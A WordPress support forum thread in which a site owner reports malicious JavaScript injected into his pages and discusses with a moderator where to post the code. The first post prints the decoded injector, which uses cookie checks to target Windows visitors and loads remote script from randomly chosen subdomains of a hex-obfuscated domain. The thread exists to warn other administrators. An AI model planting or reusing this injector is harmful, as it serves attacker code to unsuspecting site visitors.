WordPress.org

Ready to get started?Download WordPress

Forums

Javascript Injection Report - based in etufg.com (7 posts)

  1. Lucanos
    Member
    Posted 3 years ago #

    I have just discovered an incident of Javascript Injection on my WordPress-based website. I am running the latest version of WP, and all associated plugins.

    The raw code is inserted just after the opening body tag.

    The raw code is:

    [hack code moderated]

    This can be decoded to:

    <ads><script type="text/javascript">document.write( <script>var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/javascript" src="http://'+g[h]+'.\x65\x74\x75\x66\x67\x2e\x63\x6f\x6d/tools/js.js"><\/script>')};</script> );</script></ads>

    The URL at the end, which seems to be the co-ordinating centre for the attack is in Hex, and translates to:

    etufg.com

    So, this code seems to be randomly picking one of the following subdomains within that domain:

    • keg.etufg.com
    • kei.etufg.com
    • ken.etufg.com
    • kep.etufg.com
    • kev.etufg.com
    • kex.etufg.com
    • key.etufg.com
    • khi.etufg.com
    • kid.etufg.com
    • kif.etufg.com

    I would not be surprised if further subdomains and/or domains are involved, but this is just the rest of my first 40 minutes of investigations.

  2. Samuel B
    moderator
    Posted 3 years ago #

  3. Lucanos
    Member
    Posted 3 years ago #

    Thanks Samuel, I was more posting it here as it seems to be code which either has not been seen before, or has not been written up like this before (I Googled for segments of the code above, but found no matches).

    Just trying to save someone else a bit of time, effort, and hair should more people be affected.

  4. Samuel B
    moderator
    Posted 3 years ago #

    post it at pastebin.com and bring the link back here

  5. Lucanos
    Member
    Posted 3 years ago #

    Pastebin of Hack Code

    Not that I can see the point of putting the code on Pastebin, where it might be found through Googling, but with no links back to this Forum post - creating a dead-end for anyone investigating their problem. But, as you are the Mod, I will defer to your judgement.

  6. Samuel B
    moderator
    Posted 3 years ago #

    the problem putting it here is everyone's virus alert will start going off and I really don't want to deal with all the "omg, the forum's hacked" threads and emails
    :>)

  7. Lucanos
    Member
    Posted 3 years ago #

    But the code had been rendered into HTML and would not execute - so it should not have set off any kind of alerts.

    Any content I share her as a Post is parsed to make it readable - ie "<" changes to "& lt;" (space added to prevent parser from doing the same here), etc. which means that, from the view of the browser, it is content rather than structure and will be displayed, but not executed.

    I don't understand your point.

Topic Closed

This topic has been closed to new replies.

About this Topic